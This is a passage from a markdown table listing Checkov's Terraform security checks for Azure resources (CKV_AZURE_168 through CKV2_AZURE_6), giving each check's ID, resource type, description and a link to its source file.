| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1434 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1435 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 1436 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 1437 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 1438 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 1439 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 1440 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | 
[APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 1441 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 1442 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 1443 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1444 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1445 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1446 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1447 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | 
[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1448 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1449 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1450 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1451 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 1452 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 1453 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1454 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1455 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 1456 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 1457 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 1458 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 1459 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 1460 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 1461 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 1462 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 1463 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 1464 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 1465 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 1466 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 1467 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 1468 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 1469 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 1470 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 1471 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 1472 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 1473 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 1474 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 1475 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 1476 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 1477 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 1478 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 1479 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 1480 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 1481 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 1482 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 1483 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 1484 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 1485 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1486 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1487 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1488 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1489 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1490 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 1491 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 1492 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow 
connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 1493 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 1494 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 1495 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 1496 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1497 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1498 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1499 | 
CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1500 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1501 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1502 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 1503 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 1504 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 1505 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | 
[AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 1506 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1507 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1508 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 1509 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 1510 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 1511 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | 
[AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 1512 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 1513 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 1514 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 1515 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 1516 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 1517 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. 
| Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 1518 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 1519 | CKV_AZURE_239 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace administrator login password is not exposed | Terraform | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py) | +| 1520 | CKV_AZURE_240 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace is encrypted with a CMK | Terraform | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py) | +| 1521 | CKV_AZURE_241 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL pools are encrypted | Terraform | [SynapseSQLPoolDataEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py) | +| 1522 | CKV_AZURE_242 | resource | azurerm_synapse_spark_pool | Ensure isolated compute is enabled for Synapse Spark pools | Terraform | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py) | +| 1523 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | 
[StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 1524 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1525 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1526 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1527 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1528 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1529 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1530 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1531 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1532 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1533 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1534 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1535 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | 
[VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1536 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1537 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1538 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | 